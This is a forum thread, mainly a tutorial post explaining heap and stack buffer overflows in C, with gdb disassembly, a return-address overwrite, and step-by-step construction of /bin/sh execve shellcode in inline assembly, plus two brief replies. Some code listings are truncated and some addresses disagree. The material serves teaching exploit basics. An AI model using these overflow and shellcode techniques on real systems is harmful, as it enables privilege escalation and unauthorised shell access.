I will try and explain as simply as possible what is a buffer overflow and how you can detect if a program is vulnerable to buffer overflow exploits.
This thread has C source code, so if you don't know C
you can have some problems, you also need to have some
knowledge on ASM and how to use gdb.
Well everyone knows what an exploit is, but for the ones that don't know an exploit is a program, usually written in
C, that exploits some problem that another program have. The exploit will allow you to run arbitrary code that will let you do something that you shouldn't be able to do in your normal status on the system.
Nowadays, most of the exploits are what we call Buffer Overflow Exploits they can be local or remote.
Everyone knows how to use them(how do you think that most of the websites that are defaced?), but the problem is that many people don't know how to spot some
vulnerability in the source code, or even if they can they aren't able to write a exploit.
Buffer Overflow?
A buffer overflow problem is based in the memory where the program stores it's data. What a buffer overflow does is
overwrite expecific memory places where should be something you want, that will make the program do something that you want.
Let's follow a program and try to find and fix the buffer overflow
------ Partial code below--------
main(int argc, char **argv) {
char *somevar;
char *important;
somevar = (char *)malloc(sizeof(char)*4);
important = (char *)malloc(sizeof(char)*14);
strcpy(important, "command"); /*This one is the important
stcrpy(somevar, argv[1]);
..... Code here ....
.... Other functions here ....
------- End Of Partial Code ------
So let's say that important variable stores some system command like, let's say "chmod o-r file", and since that file is owned by root the program is run under root user too, this means that if you can send commands to it, you can
execute ANY system command. So you start thinking. How the hell can I put something that I want in the important variable. Well the way is to overflow the memory so we can reach it. But let's see variables memory addresses.
To do that you need to re-write the code. Check the following code.
Well we added 2 lines in the source code and left the rest unchanged. Let's see what does two lines do.
The printf("%p\n%p", somevar, important); line will print the memory addresses for somevar and important variables. The exit(0); will just keep the rest of the program running.
After running the program you would get an output like, you will probably not get the same memory addresses:
0x8049700 <----- This is the address of somevar
0x8049710 <----- This is the address of important
As we can see, the important variable is next somevar, this will let us use our buffer overflow skills, since somevar is got from argv[1]. Now, we know that one follow the other, but let's check each memory address so we can havethe precise notion of the data storage. To do this let's re-write the code again.
-------- Partial code ---------
main(int argc, char **argv) {
char *somevar;
char *important;
char *temp; /* will need another variable */
rest of code here
------ End Of partial Code ------
Now let's say that the argv[1] should be in normal use send. So you just type in your prompt:
$ program_name send
You'll get an output like this:
Starting To Print memory address:
0x8049700: s (0x616c62)
0x8049701: e (0x616c)
0x8049702: n (0x61) <---- each of this lines represent a memory address
0x8049703: d (0x0)
0x8049704: (0x0)
0x8049705: (0x0)
0x8049706: (0x0)
0x8049707: (0x0)
0x8049708: (0x0)
0x8049709: (0x19000000)
0x804970a: (0x190000)
0x804970b: (0x1900)
0x804970c: (0x19)
0x804970d: (0x63000000)
0x804970e: (0x6f630000)
0x804970f: (0x6d6f6300)
0x8049710: c (0x6d6d6f63)
0x8049711: o (0x616d6d6f)
0x8049712: m (0x6e616d6d)
0x8049713: m (0x646e616d)
0x8049714: a (0x646e61)
0x8049715: n (0x646e)
0x8049716: d (0x64)
0x8049717: (0x0)
0x8049718: (0x0)
0x8049719: (0x0)
0x804971a: (0x0)
0x804971b: (0x0)
0x804971c: (0x0)
0x804971d: (0x0)
You can now see that there exist 12 memory address empty
between somevar and important. So let's say that you run the program with a command line like:
$ program_name send------------newcommand
You'll get an output like this:
Starting To Print memory address:
0x8049700: s (0x646e6573)
0x8049701: e (0x2d646e65)
0x8049702: n (0x2d2d646e)
0x8049703: d (0x2d2d2d64)
0x8049704: - (0x2d2d2d2d)
0x8049705: - (0x2d2d2d2d)
0x8049706: - (0x2d2d2d2d)
0x8049707: - (0x2d2d2d2d)
0x8049708: - (0x2d2d2d2d)
0x8049709: - (0x2d2d2d2d)
0x804970a: - (0x2d2d2d2d)
0x804970b: - (0x2d2d2d2d)
0x804970c: - (0x2d2d2d2d)
0x804970d: - (0x6e2d2d2d)
0x804970e: - (0x656e2d2d)
0x804970f: - (0x77656e2d)
0x8049710: n (0x6377656e) <--- memory address where important variable starts
0x8049711: e (0x6f637765)
0x8049712: w (0x6d6f6377)
0x8049713: c (0x6d6d6f63)
0x8049714: o (0x616d6d6f)
0x8049715: m (0x6e616d6d)
0x8049716: m (0x646e616d)
0x8049717: a (0x646e61)
0x8049718: n (0x646e)
0x8049719: d (0x64)
0x804971a: (0x0)
0x804971b: (0x0)
0x804971c: (0x0)
0x804971d: (0x0)
Newcommand got over command. Now it does something you want,instead of something it was supposed to do.
NOTE: Remember sometimes those spaces between somevar and
important can have other variables instead of being empty, so check their values and send them to the same address, or the program can crash before getting to the variable that you modified.
Why does this happen? As you can see in the source
code somevar is declared before important, this will make, most of the times, that somevar will be first in memory. Now, let's check how each one is got. Somevar gets it's value from argv[1], and important gets it from strcpy() function, but the real problem is that important value is assigned first so whenyou assign value to somevar that is before it important can be overwritten.
This program could be patched against this buffer overflow switching those two lines, becoming :
This kind of buffer overflow, is a heap buffer overflow. They are really easy to do in theory but, in the real world, it's not
really easy to do them, after all the example I gave was a really dumb.
It's a real pain to find those important ariables, and also to overflow that variable you need to be able to write to
one that is in a lower memory address, most of times all this conditionsdont go together, that's why we are now gonna talk about stack buffer overflows.
In the last paragraph I talked about heap and stack. So here's a brief and easy of understanding definition of each one:
heap - is the space that you reserve for a variable (you access heap when you use malloc() function).
stack - it's the place where is pushed or returned values from a function. When you are trying to overflow the stack you'll try to change the return address, making the code to jump some place in memory where you have put commands that you want to execute.
So let's get into the stack. Here we will need to know ASM, know how to handle with gdb.
We will talk about Smashing the Stack which is a "attack" that
will change the return address(RET). Doing this you can return the function to an address where you already had allocate some commands that you want to execute.
Now we will try to call two times the exploit() functions.
Well first we need to find some addresses. This time let's use gdb.
First we need to compile the program.
$ gcc stack.c -o stack
$ gdb stack
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details.
This is your prompt now we will disassemble main. To do this we just need to type disassemble main:
(gdb) disas main
Dump of assembler code for function main:
0x8048440 <main>: push %ebp
0x8048441 <main+1>: mov %esp,%ebp
0x8048443 <main+3>: mov 0xc(%ebp),%eax
0x8048446 <main+6>: add $0x4,%eax
0x8048449 <main+9>: mov (%eax),%edx
0x804844b <main+11>: push %edx
0x804844c <main+12>: call 0x8048410 <exploit>
0x8048451 <main+17>: add $0x4,%esp
0x8048454 <main+20>: mov %ebp,%esp
0x8048456 <main+22>: pop %ebp
0x8048457 <main+23>: ret
End of assembler dump.
As we can see exploit is called at 0x804845c and itself has 0x8048410 as its address.
First you are probably wondering what's x/3bc command is. Well this is the command that let us examine memory.
|||--- chars
|| --- Binary
|----- define 3 as range
(For more info type in gdb prompt help x/)
I did it because I was wondering what was being pushed into the stack at 0x80484bc , and as you can see is the string we want to print.
Our goal will now be trying to make exploit return to exploit again instead of returning to main. Well first signal we have that we probably can do something to exploit the c
code is the segmentation fault we get when we give a huge string, well not that huge probably aaaaaaaaaaaaaaaaaaaa would do :) check for yourself (hint try
20). So to do that we need to change RET (return address) your now thinking in a line that you saw in gdb:
0x804844c <main+3>: call 0x8048410 <exploit>
In this important line we have 2 address, you need to use 0x804844c because it's the one that mentions a
call to exploit, if you used the 0x8048410 we wouldn't get nothing since we were pointing to
Doing this will re-write the Return address for 0x0804844c returning the functions to the call exploit again. This will put us in a endless loop.
Shell code
Now I will talk about shell code. Shell code is a char array which consist in machine instruction which are used to spawn a shell.
Since the program we try exploit doesn't have code which will execute shell,we must write it.
For this, you must know a little of assembly,C and x86 structure.
1. Shell code
Usually shell code is written in program as ->
1) char c0de[]={0x90,0x90...};
2) char c0de[]="\x90\x90...";
Both are correct so you can use both.:)).
2. Starting with shell c0de...
------- shell.cpp Code Starts Here ----------
void main(){
char *sh[2];
------- shell.cpp Code Ends Here ----------
Lets compile this with -static option and run it in gdb.
root@zxtech#cc shell.cpp -o shell -static
root@zxtech#gdb shell
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
(gdb) disass execve
Dump of assembler code for function __execve:
0x804ea70 <__execve>: push %ebx
0x804ea71 <__execve+1>: mov 0x10(%esp,1),%edx
0x804ea75 <__execve+5>: mov 0xc(%esp,1),%ecx
0x804ea79 <__execve+9>: mov 0x8(%esp,1),%ebx
0x804ea7d <__execve+13>: mov $0xb,%eax
0x804ea82 <__execve+18>: int $0x80
0x804ea84 <__execve+20>: pop %ebx
0x804ea85 <__execve+21>: cmp $0xfffff001,%eax
0x804ea8a <__execve+26>: jae 0x804ee40 <__syscall_error>
0x804ea90 <__execve+32>: ret
End of assembler dump.
(gdb) quit
Well lets look in main, All function start from there
main -> push %ebp
main+1 ->movl %esp,%ebp
This is standard procedure in all function. First save %ebp and then move %esp to %ebp making %ebp the new frame pointer.
main+3 -> sub $0x8,%esp
sub %esp with 0x8 because 2 char pointer are 8 bytes long 2*4=8:))
main+6 -> movl 0x8073768,0xfffffff8(%ebp)
same as sh[0]="/bin/sh";
main+13 -> movl $0x0,0xfffffffc(%ebp)
same as sh[1]=NULL;
main+20 -> pushl $0x0
the call of execve starts here,we are pushing arguments of function in reverse order on stack(x86 structure works upside-down).
main+22 -> lea 0xfffffff8(%ebp),%eax
lea is load efective address, we load address of sh into the array of pointers
main+25 -> pushl %eax
we push address on stack, 2nd argument(sh)
main+26 -> movl 0xfffffff8(%ebp),%eax ...
we have address of /bin/sh in 0xfffffff8(%ebp) look at main+6 and then push it on stack as sh[0]
Now lets take a look in execve function
__execve+1 mov 0x10(%esp,1),%edx
We must have address of 3rd argument in %edx(NULL was 3rd argument)
__execve+5 mov 0xc(%esp,1),%ecx
We must have address of sh in %ecx(sh was 2nd argument)
__execve+9 mov 0x8(%esp,1),%ebx
We must have address of "/bin/sh" in %ebx(sh[0] 1st argument)
__execve+13 mov $0xb,%eax
0xb is system call for execve
__execve+18 int $0x80
switching to kernel mode
Things to do->
We must have address of NULL in %edx
We must have address of sh in %ecx
We must have address of "/bin/sh" in %ebx
We must have 0xb in %eax
We must call int $0x80
Well we need the exact address in memory of our "/bin/sh" string. We can simple put "/bin/sh" after call which will push EIP on stack,and pushed EIP should be address of our string.
on beginning of code we will put JMP instruction which will jmp to call,and call will save EIP and go to offset of a. EIP will be our "/bin/sh" address
a-stands for code
J-stands for JMP
C-stands for CALL
s-stands for "/bin/sh"
well lets write this to asm->
------------ shell1.cpp Code Starts Here ----------------
void main(){
__asm__("jmp 0x1e \n" //jmp to call
"popl %esi \n" //get seved EIP to esi,now we have /bin/sh address
"movl %esi,0x8(%esi) \n" //address of sh behind /bin/sh
"movl $0x0,0xc(%esi) \n" //NULL as 3rd argument goes after sh address
"movb $0x0,0x7(%esi) \n" //terminate /bin/sh with '\0'
"movl %esi,%ebx \n" //address of sh[0] in %ebx
"leal %0x8(%esi),%ecx \n" //address of sh in %ecx(2nd argument)
"leal %0xc(%esi),%edx \n" //address of NULL in %edx(3rd argument)
"movl $0xb,%eax \n" //sys call of execve in %eax
" int $0x80 \n" //kernel mode
" call -0x23 \n" //call popl %esi
" .string \"/bin/sh\" \n"); //our string
------------ shell1.cpp Code Ends Here ----------------
Lets compile this
root@zxtech#cc shel1.cpp -o shell1
root@zxtech#gdb shell1
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
(gdb) x/bx main+3 <-------jmp start here
0x8048733 <main+3>: 0xeb
0x8048734 <main+4>: 0x1e
0x8048735 <main+5>: 0x5e
0x8048736 <main+6>: 0x89
0x8048737 <main+7>: 0x76
0x8048738 <main+8>: 0x08
0x8048739 <main+9>: 0xc6
0x804873a <main+10>: 0x46
0x804873b <main+11>: 0x07
0x804873c <main+12>: 0x00
0x804873d <main+13>: 0xc7
0x804873e <main+14>: 0x46
0x804873f <main+15>: 0x0c
0x8048740 <main+16>: 0x00
0x8048741 <main+17>: 0x00
0x8048742 <main+18>: 0x00
0x8048743 <main+19>: 0x00
0x8048744 <main+20>: 0x89
0x8048745 <main+21>: 0xf3
0x8048746 <main+22>: 0x8d
0x8048747 <main+23>: 0x4e
0x8048748 <main+24>: 0x08
0x8048749 <main+25>: 0x8d
0x804874a <main+26>: 0x56
0x804874b <main+27>: 0x0c
0x804874c <main+28>: 0xb8
0x804874d <main+29>: 0x0b
0x804874e <main+30>: 0x00
0x804874f <main+31>: 0x00
0x8048750 <main+32>: 0x00
0x8048751 <main+33>: 0xcd
0x8048752 <main+34>: 0x80
0x8048753 <main+35>: 0xe8
0x8048754 <main+36>: 0xdd
0x8048755 <main+37>: 0xff
0x8048756 <main+38>: 0xff
0x8048757 <main+39>: 0xff
0x8048758 <main+40>: 0x2f
0x8048759 <main+41>: 0x62
0x804875a <main+42>: 0x69
0x804875b <main+43>: 0x6e
0x804875c <main+44>: 0x2f
0x804875d <main+45>: 0x73
0x804875e <main+46>: 0x68 <--------- code ends here
int main(){
char buf[5];
long *ret=(long *)(buf+12);
--------------- shell2.cpp Code Ends Here ------------------
root@zxtech#cc shell2.cpp -o shell2
This works "\x2f\x62\x69\x6e\x2f\x73\x68" the same as if you wrote "/bin/sh" (this is at end of code)
Take a look at this shell code...There is \x00 or '\0' at some places. As we know '\0' is end of string.
So strcpy or other string function will copy it while they find '\0'
and our shell code wouldn't be copied all.
Lets get rid of this '\0'
change this for this
xorl %eax,%eax (this we will add)
movb $0x0,0x7(%esi) movb %al,0x7(%esi)
movl $0x0,0xc(%esi) movl %eax,0xc(%esi)
movl $0xb,$eax movb %0xb,%al
..and if you want to read the entire explaination of buffer overflows, explained (for those of you who don't know C) in a manner that you can understand, check out Aleph One's "Smashing the Stack for Fun and Profit". http://www.cse.ogi.edu/DISC/projects...rd/profit.html
Jason Parker - http://www.o-negative.net
o-Negative: Information Network
::shrug:: I guess. I've just realized that most of the people wouldn't understand bounds checking on character arrays and the problems associated when it's not done.
Not to mention that a lot of people that matriculate this list don't know how to use a debugger. Oh well.. I guess that is why we're here to discuss. Heh.. Pretty good post though..
Jason Parker - http://www.o-negative.net
o-Negative: Information Network